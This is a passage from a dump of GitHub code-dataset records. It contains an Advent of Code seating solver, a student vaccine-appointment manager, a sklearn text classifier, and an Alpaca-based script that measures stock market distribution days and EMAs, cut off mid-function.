observation = env.functional_observation(state)\n env.observation_space.contains(observation)\n","repo_name":"abaisero/gym-gridverse","sub_path":"tests/test_spaces.py","file_name":"test_spaces.py","file_ext":"py","file_size_in_byte":10545,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"4763186851","text":"#######################\n# Stephen Boyett\n# Advent of Code\n# Day 11, Part 2\n# 1/3/2021\n########################\n\nclass seatingChart:\n\n\tdef __init__(self, seats):\n\t\tself.rowlen = len(seats[0])\n\t\tself.num_rows = len(seats)\n\t\tself.seats = {(r, s): state for r, row in enumerate(seats) for s, state in enumerate(row) if state != \".\"}\n\t\tself.visible = {s: self.find_visible_seats(s) for s in self.seats.keys()}\n\n\tdef find_adj_seats(self, seat):\n\t\treturn [(r,s) for r in range(seat[0]-1, seat[0]+2) for s in range(seat[1]-1, seat[1]+2) \n\t\t\t\tif (r,s) != seat and (r,s) in self.seats.keys()]\n\n\tdef find_visible_seats(self, seat):\n\t\tlst = []\n\t\t(r, s) = seat\n\t\twhile s >= 0:\n\t\t\ts -= 1\n\t\t\tif (r, s) in self.seats.keys():\n\t\t\t\tlst.append((r,s))\n\t\t\t\tbreak\n\t\t(r,s) = seat\n\t\twhile s < self.rowlen:\n\t\t\ts += 1\n\t\t\tif (r, s) in self.seats.keys():\n\t\t\t\tlst.append((r,s))\n\t\t\t\tbreak\n\t\t(r,s) = seat\n\t\twhile r >= 0:\n\t\t\tr -= 1\n\t\t\tif (r, s) in self.seats.keys():\n\t\t\t\tlst.append((r,s))\n\t\t\t\tbreak\n\t\t(r,s) = seat\n\t\twhile r < self.num_rows:\n\t\t\tr += 1\n\t\t\tif (r, s) in self.seats.keys():\n\t\t\t\tlst.append((r,s))\n\t\t\t\tbreak\n\t\t(r,s) = seat\n\t\twhile s >= 0 and r >= 0:\n\t\t\ts -= 1\n\t\t\tr -= 1\n\t\t\tif (r, s) in self.seats.keys():\n\t\t\t\tlst.append((r,s))\n\t\t\t\tbreak\n\t\t(r,s) = seat\n\t\twhile s < self.rowlen and r < self.num_rows:\n\t\t\ts += 1\n\t\t\tr += 1\n\t\t\tif (r, s) in self.seats.keys():\n\t\t\t\tlst.append((r,s))\n\t\t\t\tbreak\n\t\t(r,s) = seat\n\t\twhile s >= 0 and r < self.num_rows:\n\t\t\ts -= 1\n\t\t\tr += 1\n\t\t\tif (r, s) in self.seats.keys():\n\t\t\t\tlst.append((r,s))\n\t\t\t\tbreak\n\t\t(r,s) = seat\n\t\twhile s < self.rowlen and r >= 0:\n\t\t\ts += 1\n\t\t\tr -= 1\n\t\t\tif (r, s) in self.seats.keys():\n\t\t\t\tlst.append((r,s))\n\t\t\t\tbreak\n\t\treturn lst\n\n\n\tdef occupied(self, seat):\n\t\treturn (self.seats[seat] == \"#\")\n\n\tdef crowded(self, seat):\n\t\treturn (sum([1 for s in self.visible[seat] if self.occupied(s)]) >= 5)\n\n\tdef spacious(self, seat):\n\t\treturn (not any([1 for s in self.visible[seat] if self.occupied(s)]))\n\n\tdef update(self):\n\t\tchange_list = []\n\t\tfor seat, state, in self.seats.items():\n\t\t\tif state == '#' and self.crowded(seat):\n\t\t\t\tchange_list.append(seat)\n\t\t\telif state == 'L' and self.spacious(seat):\n\t\t\t\tchange_list.append(seat)\n\t\tfor s in change_list:\n\t\t\tself.seats[s] = '#' if self.seats[s] == 'L' else 'L'\n\ndef main():\n\twith open(\"day11_input\", \"r\") as f:\n\t\tseats = [[s for s in r] for r in f.read().splitlines()]\n\n\tprev = {}\n\tcount = 0\n\tSC = seatingChart(seats)\n\n\twhile(prev != SC.seats):\n\t\tcount += 1\n\t\tprev = SC.seats.copy()\n\t\tSC.update()\n\tprint(f\"# of occupied seats: {list(SC.seats.values()).count('#')}\")\n\t\nif __name__==\"__main__\":\n\tmain()\n","repo_name":"sboyett31/AdventOfCode2020","sub_path":"Day11/day11_2.py","file_name":"day11_2.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8618459822","text":"# pylint: disable=R0904\n# pylint: disable=R0913\n# pylint: disable-msg=too-many-locals\n# pylint: disable-msg=too-many-branches\n# pylint: disable-msg=too-many-statements\n\"\"\"\n\nModule for the management of the vaccination process\n\n\"\"\"\nimport re\nimport json\nfrom datetime import datetime\nfrom pathlib import Path\nfrom freezegun import freeze_time\nfrom .vaccine_management_exception import VaccineManagementException\nfrom .vaccine_patient_register import VaccinePatientRegister\nfrom .vaccination_appoinment import VaccinationAppoinment\n\nclass VaccineManager:\n \"\"\"\n\n Class for providing the methods for managing the vaccination process\n\n \"\"\"\n def __init__(self):\n \"\"\"\n\n Constructor (with pass function)\n\n \"\"\"\n\n @staticmethod\n def validate_guid(patient_id):\n \"\"\"\n\n Return True if the GUID v4 is right, or false in other case\n\n \"\"\"\n valid_guid = re.compile (r'^[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-'\n r'[0-9A-F]{12}$', re.IGNORECASE)\n valid_guid4 = re.compile(r'^[0-9A-F]{8}-[0-9A-F]{4}-4[0-9A-F]{3}-[89AB][0-9A-F]{3}-'\n r'[0-9A-F]{12}$', re.IGNORECASE)\n check_guid = valid_guid.fullmatch(patient_id)\n check_guid_version = valid_guid4.fullmatch(patient_id)\n if not check_guid:\n raise VaccineManagementException(\"Error: invalid UUID\")\n if not check_guid_version:\n raise VaccineManagementException(\"Error: invalid UUID version\")\n return True\n\n\n @staticmethod\n def validate_date_signature(patient_sys_id):\n \"\"\"\n\n Returns True if the patient's date_signature is fully validated\n\n \"\"\"\n # Check data type\n if not patient_sys_id or type(patient_sys_id) != str:\n raise VaccineManagementException(\"Error: invalid Patient's date_signature' \"\n \"--> Signature's data type is not String\")\n\n # Check the length of the signature (must be exactly 64 bytes)\n patient_sys_id_length = len(patient_sys_id)\n if patient_sys_id_length != 64:\n raise VaccineManagementException(\"Error: invalid Patient's date_signature \"\n \"--> Signature must have 64 bytes\")\n\n # Check the structure with regex\n valid_signature_regex = re.compile(r'[0-9a-f]{64}', re.IGNORECASE)\n check_signature = valid_signature_regex.fullmatch(patient_sys_id)\n if not check_signature:\n raise VaccineManagementException(\"Error: invalid Patient's date_signature' \"\n \"--> Signature does not match with regex\")\n return True\n\n\n def request_vaccination_id(self, patient_id, registration_type,\n name_surname, phone_number, age):\n \"\"\"\n\n Method that validates a patient's data for vaccination\n\n \"\"\"\n\n # First we deal with errors related to patient_id\n if not patient_id or type(patient_id) != str:\n raise VaccineManagementException(\"Error: invalid UUID\")\n\n # It checks if patient_id is a valid UUID v4\n # If there are no errors, continue with the execution\n self.validate_guid(patient_id)\n\n # registration_type errors\n if registration_type != \"Regular\" and registration_type != \"Familiar\":\n raise VaccineManagementException(\"Error: registration_type must be \"\n \"'Familiar' or 'Regular'\")\n\n # name_surname errors\n if not name_surname or type(name_surname) != str:\n raise VaccineManagementException(\"Error: wrong name format\")\n if len(name_surname) > 30:\n raise VaccineManagementException(\"Error: name is too long\")\n\n # Checks if it suits the regex \"formula\"\n good_name = re.compile(r'\\w+\\s\\w+')\n test_name = good_name.fullmatch(name_surname)\n if not test_name:\n raise VaccineManagementException(\"Error: wrong name format\")\n\n # phone_number errors\n if not phone_number or type(phone_number) != str:\n raise VaccineManagementException(\"Error: invalid phone number format\")\n if len(phone_number) != 9:\n raise VaccineManagementException(\"Error: number must contain \"\n \"9 characters and only digits\")\n good_number = re.compile(r\"[0-9]{9}\")\n test_number = good_number.fullmatch(phone_number)\n if not test_number:\n raise VaccineManagementException(\"Error: number must contain \"\n \"9 characters and only numerals\")\n\n # age errors\n if not age or type(age) != str:\n raise VaccineManagementException(\"Error: invalid age format\")\n good_age = re.compile(r\"^\\d+$\")# Age has only two numbers\n test_age = good_age.fullmatch(age)\n if not test_age:\n raise VaccineManagementException(\"Error: invalid age format\")\n if int(age) not in range (6, 126):\n raise VaccineManagementException(\"Error: age must be between 6 and 125\")\n\n new_client = VaccinePatientRegister(patient_id, name_surname,\n registration_type, phone_number, age)\n\n # Checks if the patient is already registered in the system\n json_path = str(Path.home()) + \"/PycharmProjects/G80.2022.T10.EG3/src/JsonFiles/\"\n file_store = json_path + \"store_patient.json\"\n\n try:\n with open(file_store, 'r', encoding=\"utf-8\", newline=\"\") as file:\n data_list = json.load(file)\n except FileNotFoundError:\n data_list = []\n except json.JSONDecodeError:\n raise VaccineManagementException(\"JSON Decode Error - Wrong JSON Format\")\n found = False\n for item in data_list:\n if item[\"_VaccinePatientRegister__patient_id\"] == patient_id:\n if (item[\"_VaccinePatientRegister__registration_type\"] == \\\n registration_type) and (item[\"_VaccinePatientRegister__full_name\"] ==\n name_surname):\n found = True\n if found:\n raise VaccineManagementException(\"Error: patient ID already registered\")\n\n # If we reach here, the patient is not in the system, so we add him\n data_list.append(new_client.__dict__)\n try:\n with open(file_store, \"w\", encoding=\"utf-8\", newline=\"\") as file:\n json.dump(data_list, file, indent=2)\n except:\n raise VaccineManagementException(\"Wrong file or path\")\n return new_client.get_patient_system_id()\n\n\n def get_vaccine_date(self, input_file):\n \"\"\"\n\n Method that returns a 64-byte hash of the date\n\n \"\"\"\n json_path = str(Path.home()) + \"/PycharmProjects/G80.2022.T10.EG3/src/JsonFiles/\"\n file_store = json_path + \"store_patient.json\"\n\n # We open the input file to check the data\n\n with open(input_file, \"r\", encoding=\"utf-8\", newline=\"\") as file:\n try:\n patient_data = json.load(file)\n except:\n raise VaccineManagementException(\"Wrong json file format\")\n\n #############################CHECKS#############################\n\n if type(patient_data) != dict or len(patient_data.keys()) < 2:\n raise VaccineManagementException(\"Wrong json file format\")\n dict_keys = list(patient_data.keys())\n if dict_keys[0] != \"PatientSystemID\" or dict_keys[1] != \"ContactPhoneNumber\":\n raise VaccineManagementException(\"Wrong json file format\")\n\n good_id = re.compile(r\"[0-9A-Fa-f]{32}\")\n test_id = good_id.fullmatch(patient_data[\"PatientSystemID\"])\n if not test_id:\n raise VaccineManagementException(\"Wrong json file format\")\n\n good_number = re.compile(r\"[0-9]{9}\")\n test_number = good_number.fullmatch(patient_data[\"ContactPhoneNumber\"])\n if not test_number:\n raise VaccineManagementException(\"Wrong json file format\")\n\n # Opens the file that contains the patients to check if it finds the value\n with open(file_store, \"r\", encoding=\"utf-8\", newline=\"\") as file:\n data_list = json.load(file)\n\n client_system_id = patient_data[\"PatientSystemID\"]\n client_phone_number = patient_data[\"ContactPhoneNumber\"]\n\n found = False\n for item in data_list:\n if item[\"_VaccinePatientRegister__patient_sys_id\"] == \\\n client_system_id and item['_VaccinePatientRegister__phone_number'] == \\\n client_phone_number:\n found = True\n guid = item['_VaccinePatientRegister__patient_id']\n break\n if not found:\n raise VaccineManagementException(\"Patient does not exist\")\n\n # It has been found, so we create an instance of VaccinationAppointment\n new_date = VaccinationAppoinment(guid, client_system_id, client_phone_number, 10)\n\n # Checks if the client hasn't got an appointment already\n file_store_date = json_path + \"store_patient_date.json\"\n\n try:\n with open(file_store_date, 'r', encoding=\"utf-8\", newline=\"\") as file:\n data_list = json.load(file)\n except FileNotFoundError:\n data_list = []\n except json.JSONDecodeError:\n raise VaccineManagementException(\"JSON Decode Error - Wrong JSON Format\")\n found = False\n for item in data_list:\n if item[\"_VaccinationAppoinment__patient_sys_id\"] == client_system_id:\n found = True\n if found:\n raise VaccineManagementException(\"Error: patient already has an appointment.\")\n ##################################################\n\n # Adding the data to the file\n data_list.append(new_date.__dict__)\n try:\n with open(file_store_date, \"w\", encoding=\"utf-8\", newline=\"\") as file:\n json.dump(data_list, file, indent=2)\n except:\n raise VaccineManagementException(\"Wrong file or path\")\n # print(data_list)\n return new_date.vaccination_signature\n\n\n @freeze_time(\"2022-06-16\") # Congelamos el tiempo para poder realizar los tests\n def vaccine_patient(self, date_signature, date_for_test=None):\n \"\"\"\n\n Method that validates and searches a patient given a date_signature.\n The date_for_test is a testing argument, is not meant to be used in\n real-life executions.\n\n \"\"\"\n # First we need to validate the date_signature argument\n self.validate_date_signature(date_signature)\n\n # Then we need to check if date_signature exists in store_patient_date\n json_path = str(Path.home()) + \"/PycharmProjects/G80.2022.T10.EG3/src/JsonFiles/\"\n file_store_date = json_path + \"store_patient_date.json\"\n\n # If signature is valid and exists in store_patient_date we check if it already\n # exists in store_vaccine_patient\n try:\n with open(str(json_path)+\"store_vaccine_patient.json\", 'r',\n encoding='utf-8', newline=\"\") as file:\n vaccine_patients = json.load(file)[0]\n if vaccine_patients[date_signature]:\n raise VaccineManagementException(\"Error: Patient has already been vaccinated\")\n except FileNotFoundError:\n pass\n\n # We check if there are any file errors\n try:\n with open(file_store_date, 'r', encoding=\"utf-8\", newline=\"\") as file:\n data_list = json.load(file)\n\n except FileNotFoundError:\n raise VaccineManagementException(\"Error: File not found\")\n\n # Now we traverse the JSON file searching for the date_signature\n date_founded = False\n for item in data_list:\n if item[\"_VaccinationAppoinment__date_signature\"] == date_signature:\n date_founded = True\n appointment_date = item[\"_VaccinationAppoinment__appoinment_date\"]\n if not date_founded:\n raise VaccineManagementException(\"Error: date_signature doesn't exist in the system\")\n\n # If we found date_signature in the JSON file then we\n # need to check if the vaccination date is today\n actual_date = datetime.timestamp(datetime.utcnow())\n if date_for_test is None:\n if actual_date != appointment_date:\n raise VaccineManagementException(\"Error: actual date doesn't match with \"\n \"the issued vaccination date\")\n else:\n if date_for_test != appointment_date:\n raise VaccineManagementException(\"Error: actual date doesn't match with \"\n \"the issued vaccination date\")\n\n # At this point, if the issued_date is equal to actual_date,\n # the system creates a new store with the vaccination data\n try:\n with open(str(json_path+\"store_vaccine_patient.json\"), \"w\",\n encoding=\"utf-8\", newline=\"\") as file:\n json.dump([{str(date_signature): actual_date}], file, indent=2)\n except:\n raise VaccineManagementException(\"Wrong file or path\")\n return True\n","repo_name":"mario429/G80.2022.T10.EG3","sub_path":"src/main/python/uc3m_care/vaccine_manager.py","file_name":"vaccine_manager.py","file_ext":"py","file_size_in_byte":13122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34765198094","text":"from pandas import read_csv\r\nimport pymorphy2\r\nimport numpy as np\r\nfrom sklearn.feature_extraction.text import HashingVectorizer\r\nfrom sklearn.cross_validation import train_test_split\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.metrics import accuracy_score, roc_auc_score\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.model_selection import RandomizedSearchCV\r\nglobvar = 0\r\nimport pandas as pd\r\ndef vec(s):\r\n coder.fit_transform(s)\r\ndef f_tokenizer(s):\r\n global globvar # Needed to modify global copy of globvar\r\n globvar += 1\r\n print(globvar)\r\n morph = pymorphy2.MorphAnalyzer()\r\n\r\n t = s.split(' ')\r\n\r\n f = []\r\n for j in t:\r\n m = morph.parse(j.replace('.',''))\r\n if (len(m) != 0):\r\n wrd = m[0]\r\n if wrd.tag.POS not in ('NUMR','PREP','CONJ','PRCL','INTJ'):\r\n f.append(wrd.normal_form)\r\n return f\r\ndf = read_csv(\"D:\\\\MyML\\\\less5\\\\data\\\\train.csv\",sep='\\t')\r\nprint(\"load\")\r\ndftest = df#.head(20)\r\n#dftest['normname']=dftest['name'].map(f_tokenizer)\r\ndftest['data'] = dftest['name']#+\" \" + dftest['description']\r\ncoder = HashingVectorizer(tokenizer=f_tokenizer, n_features=150)\r\nprint(\"convert\")\r\n\r\n\r\n#dftest['vectorname']=dftest['normname'].map(vec)\r\n\r\ndata = dftest['data'].tolist()\r\nmyarray = np.asarray(data)\r\ntrn =coder.fit_transform(myarray)\r\nprint(\"fit\")\r\ni = 0;\r\ntarget = dftest['target']\r\n\r\nprint(\"startfit\")\r\n#grid_search = RandomizedSearchCV(model, param_distributions=param_dist,n_iter=n_iter_search, cv=3)\r\n#grid_search.fit(trn, target)\r\n#mymodel = grid_search.best_estimator_\r\nprint(\"===================================================================================\")\r\n#print(grid_search.best_params_)\r\n#print(grid_search.best_score_)\r\nprint(\"===================================================================================\")\r\n#TRNtrain, TRNtest, TARtrain, TARtest = train_test_split(trn, target, test_size=0.25)\r\n#mlymodel = model.fit(TRNtrain, TARtrain)\r\n#print('roc_auc_score: ', roc_auc_score(TARtest, mymodel.predict(TRNtest)))\r\nparams= {'max_features': ['auto', 'sqrt', 'log2', None],\r\n 'max_depth': range(3, 25),\r\n 'criterion': ['gini', 'entropy'],\r\n 'splitter': ['best', 'random'],\r\n 'min_samples_leaf': range(1, 20),\r\n }\r\nmodelC=LogisticRegression(random_state=42,max_iter=20)\r\nparam_grid = {'C': [0.0001,0.001,0.01, 0.1, 1, 10, 100,1000,10000,100000], 'penalty': ['l1', 'l2']}\r\ngrid = GridSearchCV(modelC, cv=3,scoring='roc_auc',param_grid=param_grid)\r\ngrid.fit(trn, target)\r\n#random_search.fit(trn, target)\r\nprint('Best estimator is {} with score {} using params {}'.format(modelC.__class__.__name__, grid.best_score_, grid.best_params_))\r\nprint(\"endfit\")\r\nmymodel = grid.best_estimator_\r\ndft = read_csv(\"D:\\\\MyML\\\\less5\\\\data\\\\test.csv\",sep='\\t')\r\ndft = dft#.head(10)\r\ndft['data'] = dft['name']#+\" \" + dft['description']\r\n\r\ndataTestT = dft['data'].tolist()\r\nmyarrayTestT = np.asarray(dataTestT)\r\nXtest =coder.fit_transform(myarrayTestT)\r\n\r\ntarget = mymodel.predict(Xtest)\r\nres = pd.Series(target)\r\ndft['target']=res\r\ndfres=dft[['id','target']]\r\n\r\ndfres.to_csv('D:\\MyML\\\\less5\\\\results2.csv',sep=',', index=False)\r\nprint(\"End\")\r\n","repo_name":"Legatinka1/sfml","sub_path":"hw5.py","file_name":"hw5.py","file_ext":"py","file_size_in_byte":3496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16292709857","text":"#### The Purpose of this file is to look at Market Internals and Metrics which determine the health of the trend.\n#### The file will return different scores which will then be used when managing the portfolio. \n\n#### Low Scores: Suggest trimming profitable positions into strength(2-3 ATR from 21 EMA), cutting low Relative strength stocks\n#### and becoming more picky with future entries for the short term. (A bigger emphasis on TML (True Market Leaders) and heavy volume breakouts)\n\n#### High scores: Suggest Positions can be swung for longer, portfolio exposure can increase if some of psoitions are in profit and stop-loss gets move up.\n####: Less picky on future entries with the focus on stocks form the leading sectors.\n\n##Distribution Day: A day where market index drops by more than .2% with greater volume than the day before. Indicates Institutional selling AKA Distribution.\n##########################################################################################################################################################\n#import alpaca_trade_api as tradeapi\nfrom asyncio.windows_events import NULL\nfrom calendar import week\nfrom unicodedata import name\nfrom alpaca_trade_api.rest import REST, TimeFrame\nimport datetime as dt #to get date\nimport pytz #to get date\nimport math #rounding purposes\nimport web_socket_daily_bar #Needs to be dubugged later\nimport pandas as pd \n\n#api_test = REST()\n#import alpaca_trad_api #delete\nimport time\nfrom pytz import timezone\nimport logging #added for logging purposes\nimport logging.handlers #added for logging purposes\n\n#Constants\nPERCENT_TO_BE_DISTRIBUTION = -.2\nLONG_DISTRIBUTION_NUMBER = 25\nSHORT_DISTRIBUTION_NUMBER = 7\n\n#CONSTANT COMPUTATIONS\n#Extra Days added to account for weekend and Holidays\nLONG_DISTRIBUTION = math.ceil((LONG_DISTRIBUTION_NUMBER *((8/5)) + 10))\nSHORT_DISTRIBUTION = math.ceil((SHORT_DISTRIBUTION_NUMBER *((8/5)) + 10))\n\n#############################################################################################################################################\n#Print Distribution Days for Major Indexes\ndef print_distribution_day(distribution_array):\n print(\"Distribution Day Count($SPY) over last\",LONG_DISTRIBUTION_NUMBER, \" days: \", distribution_array[0])\n print(\"Distribution Day Count($SPY) over last\",SHORT_DISTRIBUTION_NUMBER, \" days: \", distribution_array[1])\n print(\"Distribution Day Count($QQQ) over last\",LONG_DISTRIBUTION_NUMBER, \" days: \", distribution_array[2])\n print(\"Distribution Day Count($QQQ) over last\",SHORT_DISTRIBUTION_NUMBER, \" days: \", distribution_array[3])\n print(\"Distribution Day Count($DIA) over last\",LONG_DISTRIBUTION_NUMBER, \" days: \", distribution_array[4])\n print(\"Distribution Day Count($DIA) over last\",SHORT_DISTRIBUTION_NUMBER, \" days: \", distribution_array[5])\n print(\"Distribution Day Count($IWO) over last\",LONG_DISTRIBUTION_NUMBER, \" days: \", distribution_array[6])\n print(\"Distribution Day Count($IWO) over last\",SHORT_DISTRIBUTION_NUMBER, \" days: \", distribution_array[7])\n print(\"Distribution Day Count($IWM) over last\",LONG_DISTRIBUTION_NUMBER, \" days: \", distribution_array[8])\n print(\"Distribution Day Count($IWM) over last\",SHORT_DISTRIBUTION_NUMBER, \" days: \", distribution_array[9])\n\n#FOR TESTING BAR VALUES\ndef print_Close(NUM_DAYS, TICKER_D_BARS):\n lenght_data = len(TICKER_D_BARS)\n for i in range (lenght_data):\n print(\"Index: \", i, \"Date: \", TICKER_D_BARS[i].t, \"Close: \", TICKER_D_BARS[i].c )\n############################################################################################################################################\n############################################################################################################################################\n\n\n##Returns Distribution Day Count\ndef get_Distribution_DAY_COUNT(NUM_DAYS, TICKER_D_BARS):\n distribution_days = 0\n\n #Get Start Index\n start_index = (len(TICKER_D_BARS)) - NUM_DAYS\n end_index = (len(TICKER_D_BARS)) - 1\n\n #Itterate through start and end index\n for i in range (start_index, end_index):\n #Calculate percentage chnage from yesterdays close\n change_percent = ((((TICKER_D_BARS[i+1].c) - (TICKER_D_BARS[i].c)) / (TICKER_D_BARS[i].c))) * 100\n\n # IF index dropped by more than .2% look at volume comparison between yesterday and today\n if(change_percent <= PERCENT_TO_BE_DISTRIBUTION):\n if((TICKER_D_BARS[i+1].v - (TICKER_D_BARS[i].v)) > 0): \n distribution_days = distribution_days + 1\n \n\n return distribution_days\n#############################################################################################################################################\n#Main function in file\ndef get_distribution_health(api, group):\n \n ###################################################################################\n ###################################################################################\n #calculate Distribution Day Count For Major Indexes ($SPY, $QQQ, $DIA, $IWO, $IWM)\n # over a longer period (currentlly lsast 25 days) and over a shorter period (last 7 days)\n ###################################################################################\n ###################################################################################\n\n #Calculate start_time since get_bars works in reverse for get_bars (V2 endpoint)\n #Reference https://forum.alpaca.markets/t/get-bars-vs-get-barset/8127/6\n timeNow = dt.datetime.now(pytz.timezone('US/Eastern'))\n start_time_long_distribution = timeNow - dt.timedelta(days=LONG_DISTRIBUTION)\n \n #for every stock in the group, calculate Distribution Day Count. Used primarilly For Major Indexes ($SPY, $QQQ, $DIA, $IWO, $IWM)\n # over a longer period (currentlly lsast 25 days) and over a shorter period (last 7 days)\n for stock in group.stock_objects_array:\n\n #logging message to print names being processed\n temp_string = \"DATA BEING COLLECTED FOR \" + stock.name + \" object ******\"\n logging.info(temp_string)\n \n #Get DAILY BARS for stock\n temp_D_BARSET = api.get_bars(stock.name, TimeFrame.Day, start = start_time_long_distribution.isoformat(), end = None, limit = LONG_DISTRIBUTION)\n\n # Calculate Short and Long Distribution Day Count\n # Populate Stock object with the Long Distribution and Short Distribution Count\n stock.distribution_Long_len = get_Distribution_DAY_COUNT(LONG_DISTRIBUTION_NUMBER, temp_D_BARSET)\n stock.distribution_Short_len = get_Distribution_DAY_COUNT(SHORT_DISTRIBUTION_NUMBER, temp_D_BARSET)\n \n #Clear Temp Arrays\n temp_D_BARSET = [] \n\n############################################################################################################################## \n##############################################################################################################################\n#GET 9ema AND 21 ema on DAILY CHART\ndef get_ema_health(api, group):\n\n #Constants\n SHORT_EMA = 9\n LONG_EMA = 21\n\n #Computations to get extra bars since get_bars() will count weekends and holidays as a day\n #math.ceil((LONG_DISTRIBUTION_NUMBER *((7/5)) + 10))\n DATA_PERIOD = math.ceil((((LONG_EMA * 2) * (7/5)) + 10))\n timeNow = dt.datetime.now(pytz.timezone('US/Eastern'))\n start_time_long_emas = timeNow - dt.timedelta(days=DATA_PERIOD)\n start_time_hours = (timeNow - dt.timedelta(hours=60)).isoformat()\n\n \n #Itterate through the list of stocks in group and get EMA health\n for stock in group.stock_objects_array:\n\n #Get Daily bar data then parse only the Closes\n temp_D_BARSET = api.get_bars(stock.name, TimeFrame.Day, start = start_time_long_emas.isoformat(), end = None, limit = DATA_PERIOD)\n temp_EMA_C = parse_closes(temp_D_BARSET)\n\n #Get an Estimate of the Current Price Right Now (AKA Todays current close) and parse only candle closes\n last_few_hours_temp = api.get_bars(stock.name, TimeFrame.Hour, start = start_time_hours, end = None, limit = 60)\n last_few_hours_temp_C = parse_closes(last_few_hours_temp)\n\n #Get Most Current Hourly Close and append to dataset\n len_temp = len(last_few_hours_temp_C)\n temp_price_now = last_few_hours_temp_C[len_temp - 1]\n temp_EMA_C.append(temp_price_now)\n\n #Compute Long and Short EMA arrays for each index and populate stock object with current EMA data\n\n temp_EMA_21_array = ema(temp_EMA_C, LONG_EMA)\n temp_EMA_9_array = ema(temp_EMA_C, SHORT_EMA)\n\n stock.EMA_21 = temp_EMA_21_array[len(temp_EMA_21_array) - 1]\n stock.EMA_9 = temp_EMA_9_array[len(temp_EMA_9_array) - 1]\n\n #Clear temp Arrays and Varibales\n del temp_D_BARSET,temp_EMA_C, last_few_hours_temp, last_few_hours_temp_C, len_temp, temp_price_now, temp_EMA_21_array, temp_EMA_9_array\n\n\n########################################################################################################################\n########################################################################################################################\n### Parse CLosing Data ##########\ndef parse_closes(RAW_DATA):\n temp_array = []\n \n for i in range((len(RAW_DATA)) -1):\n temp_array.append(RAW_DATA[i].c)\n\n return temp_array\n################################################################################################################\n########################################################################################################################\n\n\n################################################################################################################\n#Function TAKEN FROM https://stackoverflow.com/questions/488670/calculate-exponential-moving-average-in-python\ndef ema(s, n):\n \"\"\"\n returns an n period exponential moving average for\n the time series s\n\n s is a list ordered from oldest (index 0) to most\n recent (index -1)\n n is an integer\n\n returns a numeric array of the exponential\n moving average\n \"\"\"\n #s = array(s)\n ema = []\n j = 1\n\n #get n sma first and calculate the next n period ema\n sma = sum(s[:n]) / n\n multiplier = 2 / float(1 + n)\n ema.append(sma)\n\n #EMA(current) = ( (Price(current) - EMA(prev) ) x Multiplier) + EMA(prev)\n ema.append(( (s[n] - sma) * multiplier) + sma)\n\n #now calculate the rest of the values\n for i in s[n+1:]:\n tmp = ( (i - ema[j]) * multiplier) + ema[j]\n j = j + 1\n ema.append(tmp)\n\n return ema\n ################################################################################################################\n ################################################################################################################\n\ndef get_price_estimate(api, group):\n\n # Check if the market is open now. Code From Reference\n #Reference: https://alpaca.markets/deprecated/docs/api-documentation/how-to/market-hours/#:~:text=See%20if%20the%20Market%20is,closed%20on%20a%20particular%20date.\n clock = api.get_clock()\n timeNow = dt.datetime.now(pytz.timezone('US/Eastern'))\n\n #Determine if market is OPEN OR CLOSES\n #IF market OPEN, pull most recent minute candles\n if(clock.is_open):\n logging.info(\"Algorithm Determined Market is OPEN from:get_price_estimate()\")\n\n #Itterate through the list of stocks in group and get most recent MINUTE close. Store attribute as current_price_estimate \n for stock in group.stock_objects_array:\n start_time_hours = (timeNow - dt.timedelta(hours=1)).isoformat()\n\n last_few_hours_temp = api.get_bars(stock.name, TimeFrame.Minute, start = start_time_hours, end = None, limit = 120)\n last_few_hours_temp_C = parse_closes(last_few_hours_temp)\n len_temp = len(last_few_hours_temp_C) \n stock.current_price_estimate = last_few_hours_temp_C[len_temp - 1]\n\n del start_time_hours, last_few_hours_temp, last_few_hours_temp_C, len_temp\n \n #IF market CLOSED, pull most recent hour candles. Make sure if it is Sunday we can still pull Friday's data\n else:\n logging.info(\"Algorithm Determined Market is CLOSED from:get_price_estimate()\")\n \n #Itterate through the list of stocks in group and get most recent HOUR close. Store attribute as current_price_estimate \n for stock in group.stock_objects_array:\n start_time_hours = (timeNow - dt.timedelta(hours=60)).isoformat()\n\n last_few_hours_temp = api.get_bars(stock.name, TimeFrame.Hour, start = start_time_hours, end = None, limit = 60)\n last_few_hours_temp_C = parse_closes(last_few_hours_temp)\n len_temp = len(last_few_hours_temp_C) \n stock.current_price_estimate = last_few_hours_temp_C[len_temp - 1]\n\n del start_time_hours, last_few_hours_temp, last_few_hours_temp_C, len_temp\n\n################################################################################################################\n################################################################################################################\n### Get Daily Bars Helper function for a specific stock\ndef get_Dataset_D(api, stock, DATA_PERIOD = 260):\n\n timeNow = dt.datetime.now(pytz.timezone('US/Eastern'))\n start_time = timeNow - dt.timedelta(days=DATA_PERIOD)\n start_time_hours = (timeNow - dt.timedelta(hours=60)).isoformat()\n\n #Determine Daily trend by pulling daily bars\n temp_D_BARSET = api.get_bars(stock.name, TimeFrame.Day, start = start_time.isoformat(), end = None, limit = DATA_PERIOD)\n temp_D_BARSET_PARSED = parse_closes(temp_D_BARSET)\n\n last_few_hours_temp = api.get_bars(stock.name, TimeFrame.Hour, start = start_time_hours, end = None, limit = 60)\n last_few_hours_temp_C = parse_closes(last_few_hours_temp)\n\n #Get Most Current Hourly Close and append to dataset\n len_temp = len(last_few_hours_temp_C)\n temp_price_now = last_few_hours_temp_C[len_temp - 1]\n temp_D_BARSET_PARSED.append(temp_price_now)\n\n #Store attribute and return dataset\n stock.dataset = temp_D_BARSET_PARSED\n return temp_D_BARSET_PARSED\n\n################################################################################################################\ndef get_Dataset_W(api, stock, DATA_PERIOD = 100):\n timeNow = dt.datetime.now(pytz.timezone('US/Eastern'))\n start_time = timeNow - dt.timedelta(weeks=DATA_PERIOD)\n start_time_hours = (timeNow - dt.timedelta(hours=60)).isoformat()\n\n #Determine Weekly trend by pulling daily bars\n temp_W_BARSET = api.get_bars(stock.name, TimeFrame.Week, start = start_time.isoformat(), end = None, limit = DATA_PERIOD)\n temp_W_BARSET_PARSED = 